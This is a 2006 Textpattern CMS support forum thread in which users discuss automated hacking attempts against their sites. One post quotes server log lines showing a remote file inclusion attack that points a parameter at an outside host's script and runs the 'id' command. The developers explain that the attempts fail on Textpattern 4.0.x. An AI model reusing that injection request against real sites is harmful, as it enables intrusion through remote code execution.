Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2006-10-26 20:57:33

BZ
Member
From: Stuttgart, Germany
Registered: 2005-11-24
Posts: 65
Website

hacking attempt at my site?

hi folks,

it seems like someone has repeatedly tried to hack my site via inserting external code. i’m still on 4.0.3.
does this happen frequently? how are the chances that this jackass will be successful?


Diagnosis:
Version Textpattern: 4.0.3 (r1188)
PHP-Version: 4.4.1
Hosting: all-inkl.com

Offline

#2 2006-10-26 21:38:51

TheEric
Plugin Author
From: Wyoming
Registered: 2004-09-17
Posts: 566

Re: hacking attempt at my site?

It’s normal. It happens everyday as script-kiddies try every range of IP domains that they can come across. Don’t think anything of it.

Offline

#3 2006-10-26 22:20:39

zem
Developer Emeritus
From: Melbourne, Australia
Registered: 2004-04-08
Posts: 2,579

Re: hacking attempt at my site?

how are the chances that this jackass will be successful?

Given the kind of attacks we’ve seen sofar: none at all, if you’re running 4.0.x.

We have found and fixed security holes in every 4.0.x release sofar. The script kiddies haven’t found those yet, but we know they are looking. (And reading this forum – hello, losers).


Alex

Offline

#4 2006-10-29 01:37:54

NyteOwl
Member
From: Nova Scotia, Canada
Registered: 2005-09-24
Posts: 539

Re: hacking attempt at my site?

Found this in today’s logs – persistant fellow.

10/28 6:25 pm 20150202054.user.veloxzone.com.br category/Tips-and-Tricks/textpattern/publish.php?txpcfg[txpath]=http://www.kiler6.com/cmd/tool25.dat?&cmd=id

10/28 3:59 pm 20150220019.user.veloxzone.com.br category/Technology/textpattern/publish.php?txpcfg[txpath]=http://www.kiler6.com/cmd/tool25.dat?&;cmd=id

10/28 3:59 pm 20150220019.user.veloxzone.com.br category/Technology/textpattern/publish.php?txpcfg[txpath]=http://www.kiler6.com/cmd/tool25.dat?&;cmd=id


Obsolescence is just a lack of imagination. / 36-bits Forever! / #include <disclaimer.h>;

Offline

#5 2006-10-29 01:57:57

zem
Developer Emeritus
From: Melbourne, Australia
Registered: 2004-04-08
Posts: 2,579

Re: hacking attempt at my site?

They’re scanning for this vulnerability with an automated bot, probably hitting sites that show up in a google search. It has no effect on Textpattern 4.0.x, other than cluttering up the visitor logs.

Last edited by zem (2006-10-29 01:59:13)


Alex

Offline

Board footer

Powered by FluxBB